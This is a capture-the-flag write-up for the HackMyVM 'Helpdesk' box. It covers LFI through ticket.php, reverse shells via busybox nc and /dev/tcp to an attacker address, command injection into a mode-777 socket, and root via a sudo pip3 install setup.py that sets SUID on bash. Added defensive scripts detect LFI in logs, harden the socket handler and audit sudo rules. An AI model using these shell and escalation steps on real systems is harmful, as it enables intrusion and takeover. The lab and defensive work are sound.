Helpdesk

Target machine: https://hackmyvm.eu/machines/machine.php?vm=Helpdesk

Information gathering

Host discovery

```
root@LAPTOP-O235O5EH [~] ➜  arp-scan -l                                                  [15:15:56]
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.100.35
Starting arp-scan 1.10.0 with 512 hosts (https://github.com/royhills/arp-scan)
......
192.168.100.76 08:00:27:e5:04:39 PCS Systemtechnik GmbH
......

41 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 512 hosts scanned in 2.888 seconds (177.29 hosts/sec). 38 responded
```

Port scanning

```
root@LAPTOP-O235O5EH [~] ➜  rustscan -a 192.168.100.76                                   [15:16:05]
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
RustScan: Exploring the digital landscape, one IP at a time.

[~] The config file is expected to be at "/root/.rustscan.toml"
[~] File limit higher than batch size. Can increase speed by increasing batch size '-b 10140'.
Open 192.168.100.76:22
Open 192.168.100.76:80
[~] Starting Script(s)
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2026-01-19 15:17 CST
Initiating ARP Ping Scan at 15:17
Scanning 192.168.100.76 [1 port]
Completed ARP Ping Scan at 15:17, 0.03s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 15:17
Completed Parallel DNS resolution of 1 host. at 15:17, 6.52s elapsed
DNS resolution of 1 IPs took 6.52s. Mode: Async [#: 2, OK: 0, NX: 1, DR: 0, SF: 0, TR: 3, CN: 0]
Initiating SYN Stealth Scan at 15:17
Scanning 192.168.100.76 [2 ports]
Discovered open port 80/tcp on 192.168.100.76
Discovered open port 22/tcp on 192.168.100.76
Completed SYN Stealth Scan at 15:17, 0.01s elapsed (2 total ports)
Nmap scan report for 192.168.100.76
Host is up, received arp-response (0.00054s latency).
Scanned at 2026-01-19 15:17:37 CST for 0s

PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 64
80/tcp open http syn-ack ttl 64
MAC Address: 08:00:27:E5:04:39 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 6.65 seconds
Raw packets sent: 3 (116B) | Rcvd: 3 (116B)
```

80/tcp

```
root@LAPTOP-O235O5EH [~] ➜  gobuster dir -u http://192.168.100.76 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt,zip,bak,js,py,sh,swp
===============================================================
Gobuster v3.8
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.100.76
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.8
[+] Extensions: js,py,sh,swp,txt,zip,php,html,bak
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.php (Status: 200) [Size: 1290]
/login.php (Status: 200) [Size: 1819]
/javascript (Status: 301) [Size: 241] [--> http://192.168.100.76/javascript/]
/helpdesk (Status: 301) [Size: 239] [--> http://192.168.100.76/helpdesk/]
/ticket.php (Status: 200) [Size: 204]
/panel.php (Status: 302) [Size: 0] [--> login.php]
/debug.php (Status: 200) [Size: 250]
/server-status (Status: 403) [Size: 199]
Progress: 2205580 / 2205580 (100.00%)
===============================================================
Finished
===============================================================
```

/debug.php leaks a set of credentials, but they do not work for logging in:

service_user:SuperSecretDev123!

Local file inclusion (LFI)

Fuzzing the GET parameter name on /ticket.php, with /etc/passwd as the value and the default 204-character response filtered out, turned up the vulnerable parameter:

```
root@LAPTOP-O235O5EH [~] ➜  wfuzz -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories-lowercase.txt -u http://192.168.100.76/ticket.php\?FUZZ\=/etc/passwd --hh 204
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************

Target: http://192.168.100.76/ticket.php?FUZZ=/etc/passwd
Total requests: 56162

=====================================================================
ID Response Lines Word Chars Payload
=====================================================================

000000981: 200 40 L 82 W 2135 Ch "url"

Total time: 0
Processed Requests: 56162
Filtered Requests: 56161
Requests/sec.: 0
```

The same parameter reads the source of login.php:

```
http://192.168.100.76/ticket.php?url=login.php
```

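From the defender's side, both requests above leave a clear trace in the web server's access log. The following shell function is an added example (not part of the original writeup): it reads Apache combined-format log lines on stdin and prints the ones whose `ticket.php?url=` value looks like file inclusion, whether an absolute path, directory traversal (also in its percent-encoded form), a stream wrapper, or one of the application's own source files. The log lines are constructed for the demonstration; the only page-derived facts are the `ticket.php` endpoint and the `url` parameter.

```shell
#!/bin/bash
# Added example, not from the original writeup: flag likely LFI probes against
# ticket.php in Apache combined-format access logs. Sample lines are constructed.
SAMPLE_LOG='192.168.100.35 - - [19/Jan/2026:15:20:01 +0800] "GET /ticket.php?id=42 HTTP/1.1" 200 204 "-" "Mozilla/5.0"
192.168.100.35 - - [19/Jan/2026:15:20:05 +0800] "GET /ticket.php?url=/etc/passwd HTTP/1.1" 200 2135 "-" "Wfuzz/3.1.0"
192.168.100.35 - - [19/Jan/2026:15:21:10 +0800] "GET /ticket.php?url=login.php HTTP/1.1" 200 1819 "-" "Mozilla/5.0"
192.168.100.35 - - [19/Jan/2026:15:22:30 +0800] "GET /ticket.php?url=..%2f..%2fetc%2fshadow HTTP/1.1" 200 310 "-" "curl/8.0"
192.168.100.35 - - [19/Jan/2026:15:23:00 +0800] "GET /index.php HTTP/1.1" 200 1290 "-" "Mozilla/5.0"'

# Undo the percent-encodings most often used to hide traversal (%2e -> ".",
# %2f -> "/", %5c -> "\"); everything else in the line is left untouched.
url_decode_basic() {
    sed -e 's/%2[eE]/./g' -e 's/%2[fF]/\//g' -e 's/%5[cC]/\\/g'
}

# Reads log lines on stdin and prints those whose ticket.php?url= value is an
# absolute path, starts with "../", uses a wrapper such as php://, or names a
# .php/.ini/.conf file (reading the app's own source, as login.php above).
flag_lfi_requests() {
    url_decode_basic \
    | grep -E '/ticket\.php\?url=' \
    | grep -Ei 'url=(/|\.\./|[a-z]+://|[^ &"]*\.(php|ini|conf)([ &"]|$))'
}

# Convenience wrapper over the constructed sample: number of flagged lines.
count_flagged() {
    printf '%s\n' "$SAMPLE_LOG" | flag_lfi_requests | wc -l | tr -d ' '
}
```

Run against a real log as `flag_lfi_requests < /var/log/apache2/access.log` (path assumed). Of the five constructed lines, three are flagged: the `/etc/passwd` probe, the `login.php` source read, and the encoded traversal; the ordinary `?id=42` request and the index page pass through unflagged. Decoding before matching matters because the raw line for the fourth request contains no literal `../`.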
Log in through login.php.

The panel has a diagnostics feature that executes system commands.

Use it to get a reverse shell:

```
busybox nc 192.168.100.35 7777 -e /bin/bash
```

Privilege escalation

www shell

There is a Unix domain socket in /opt/helpdesk-socket, along with the scripts that serve it:

```
www-data@helpdesk:/opt/helpdesk-socket$ cat serve.sh
#!/bin/bash

SOCKET="/opt/helpdesk-socket/helpdesk.sock"

[ -e "$SOCKET" ] && rm "$SOCKET"

/usr/bin/socat -d -d UNIX-LISTEN:$SOCKET,fork,mode=777 EXEC:/opt/helpdesk-socket/handler.sh
```

  • `[ -e "$SOCKET" ]`: bash file test; checks whether the path in `$SOCKET` exists (`-e` for "exists").

  • `&&`: bash logical operator; the right-hand command runs only if the left-hand one succeeded (exit status 0).

  • `rm "$SOCKET"`: removes a pre-existing socket file.

  • Purpose of the line: a stale socket file would make the listen fail, because socket files are not removed automatically when the process that created them exits.

  • `/usr/bin/socat`: full path to socat, so the script does not depend on PATH.

  • `-d -d`: debug mode with detailed logging (each `-d` raises the verbosity level, which helps when troubleshooting).

  • `UNIX-LISTEN:$SOCKET`: socat listens on a Unix domain socket at the path `$SOCKET`.

  • `fork`: the important option; for every client connection socat forks a child to handle it while the parent keeps listening, so several clients can connect at once.

  • `mode=777`: the socket file is created with permissions 777 (readable, writable and executable by every user), so any local account can connect to it.

  • `EXEC:/opt/helpdesk-socket/handler.sh`: for each connection, handler.sh is executed to service it.

```
www-data@helpdesk:/opt/helpdesk-socket$ cat handler.sh
#!/bin/bash
# Simple parser — executes anything sent over the socket (dangerous!)
read cmd
echo "[HelpDesk Automation] Executing: $cmd"
/bin/bash -c "$cmd"
```

handler.sh is what serve.sh hands every client connection to, and it does nothing but pass the first line it receives to `bash -c`, with no validation, under the account serve.sh runs as. Combined with the world-accessible socket, any local user gets command execution as that account.

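The fix is on the handler side, not the socket side alone: a service like this should never hand client text to a shell. The script below is an added example, not the VM's own handler, showing how serve.sh's `EXEC:` target could be written so that clients can only name an action from a fixed allowlist. The action names (`status`, `disk`) and the `HELPDESK_HANDLER_SERVE` switch are assumptions made for the example.

```shell
#!/bin/bash
# Added example, not the VM's own code: a hardened stand-in for handler.sh.
# The original does `read cmd; /bin/bash -c "$cmd"`, so every local user who
# can open the mode-777 socket runs shell commands as the service account.
# This version accepts only a short action name from a fixed allowlist and
# never passes client text to a shell. Action names are assumptions.

# Allowlisted actions: each name maps to one fixed command line. Client text
# is only compared against these names, never interpolated into a command.
dispatch_action() {
    case "$1" in
        status) echo "helpdesk automation: alive" ;;
        disk)   df -h / ;;
        *)      return 2 ;;                       # unknown action
    esac
}

# A request is a single token of 1..32 characters from [a-z_]. Spaces, ';',
# '|', '$', quotes, uppercase or an empty line are refused before dispatch.
validate_request() {
    local req="$1"
    if [ "${#req}" -eq 0 ] || [ "${#req}" -gt 32 ]; then
        return 1
    fi
    case "$req" in
        *[!a-z_]*) return 1 ;;
    esac
    return 0
}

# Handle one request line. Returns 0 on success, 1 if refused, or the
# allowlisted command's own non-zero status if that command failed.
handle_request() {
    local req="$1"
    local rc=0
    if ! validate_request "$req"; then
        echo "[HelpDesk Automation] refused: malformed request"
        return 1
    fi
    dispatch_action "$req" || rc=$?
    if [ "$rc" -eq 2 ]; then
        echo "[HelpDesk Automation] refused: unknown action '$req'"
        return 1
    fi
    return "$rc"
}

# When socat EXECs this script, read one line (-r keeps backslashes literal)
# and handle it. HELPDESK_HANDLER_SERVE is an assumed switch that serve.sh
# would export; without it the file only defines functions and can be sourced.
if [ "${HELPDESK_HANDLER_SERVE:-0}" = "1" ]; then
    IFS= read -r request
    handle_request "$request"
fi
```

A request such as `status` is served; `id; bash -i`, an empty line or an unknown name is refused with a message and a non-zero status, and nothing the client sends is ever evaluated. On the listener side, the `mode=777` in serve.sh should likewise be reduced so that only the group that legitimately uses the automation can connect (socat's `UNIX-LISTEN` accepts `mode=` and `group=` for this); the allowlist then limits what even that group can do.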
www -> helpdesk

From the www-data shell, send a reverse-shell command into the socket:

```
echo "/bin/bash -i >& /dev/tcp/192.168.100.35/8888 0>&1" | socat - UNIX-CONNECT:/opt/helpdesk-socket/helpdesk.sock
```

helpdesk -> root

```
helpdesk@helpdesk:/$ sudo -l
Matching Defaults entries for helpdesk on helpdesk:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
use_pty

User helpdesk may run the following commands on helpdesk:
(ALL) NOPASSWD: /usr/bin/pip3 install --break-system-packages *
```

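A rule like this is easy to miss in a sudoers review because the command looks narrow. The shell function below is an added example (not from the original writeup) that reads `sudo -l` output on stdin and reports rules worth reviewing: `NOPASSWD` entries, wildcard arguments, and commands whose normal job is to run code from their arguments (package installers execute setup scripts, so letting a user run one as root is a root rule). The sample output is constructed around the rule found on this box; the two extra rules are invented filler, and the list of code-running binaries is an assumption.

```shell
#!/bin/bash
# Added example, not from the original writeup: audit "sudo -l" output for
# rules that grant more than they appear to. Sample text is constructed around
# the rule on this box; the other two rules are invented filler.
SAMPLE_SUDO_L='Matching Defaults entries for helpdesk on helpdesk:
    env_reset, mail_badpass, use_pty

User helpdesk may run the following commands on helpdesk:
    (ALL) NOPASSWD: /usr/bin/pip3 install --break-system-packages *
    (root) /usr/bin/systemctl restart apache2
    (ALL) NOPASSWD: /usr/bin/apt-get update'

# Package installers and interpreters run code supplied through their
# arguments as part of their normal job (assumed list for the example).
CODE_RUNNING_BINS='pip3 pip python3 npm gem'

# Reads "sudo -l" text on stdin; prints one tab-separated line per rule worth
# reviewing: severity, findings, command. Rules without findings are silent.
audit_sudo_output() {
    grep -E '^[[:space:]]*\([^)]*\)' | while IFS= read -r rule; do
        cmd=${rule#*\)}                     # drop the "(ALL)" / "(root)" part
        case "$cmd" in
            *NOPASSWD:*) cmd=${cmd#*NOPASSWD:} ;;
        esac
        cmd=${cmd#"${cmd%%[! ]*}"}          # trim leading spaces
        bin=$(basename "${cmd%% *}")
        findings=""
        severity="info"
        case "$rule" in *NOPASSWD:*) findings="nopasswd" ;; esac
        case "$cmd" in *'*'*) findings="$findings wildcard"; severity="high" ;; esac
        for b in $CODE_RUNNING_BINS; do
            if [ "$bin" = "$b" ]; then
                findings="$findings code-runner"
                severity="high"
            fi
        done
        if [ -n "$findings" ]; then
            printf '%s\t%s\t%s\n' "$severity" "${findings# }" "$cmd"
        fi
    done
}

# Convenience wrappers over the constructed sample.
count_findings() {
    printf '%s\n' "$SAMPLE_SUDO_L" | audit_sudo_output | wc -l | tr -d ' '
}
high_findings() {
    printf '%s\n' "$SAMPLE_SUDO_L" | audit_sudo_output | grep -c '^high'
}
```

On the sample, the pip3 rule is reported as `high` with all three findings (`nopasswd wildcard code-runner`), the apt-get rule as `info` for its `NOPASSWD` tag, and the systemctl rule is not reported. For a live host, feed it real output with `sudo -l | audit_sudo_output`. The remediation for the `high` case is to drop the rule: there is no safe way to let an unprivileged user run `pip3 install` with free arguments as root, because the installer will execute whatever `setup.py` it is pointed at.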
The sudo rule allows `pip3 install --break-system-packages` with any argument as root, which can be used to escalate privileges, since pip runs the package's setup.py during installation.

```
cd ~
mkdir exp
cd exp
vim setup.py
...
import os
os.system("chmod +s /bin/bash")
...
sudo /usr/bin/pip3 install --break-system-packages /home/helpdesk/exp/
/bin/bash -p
```
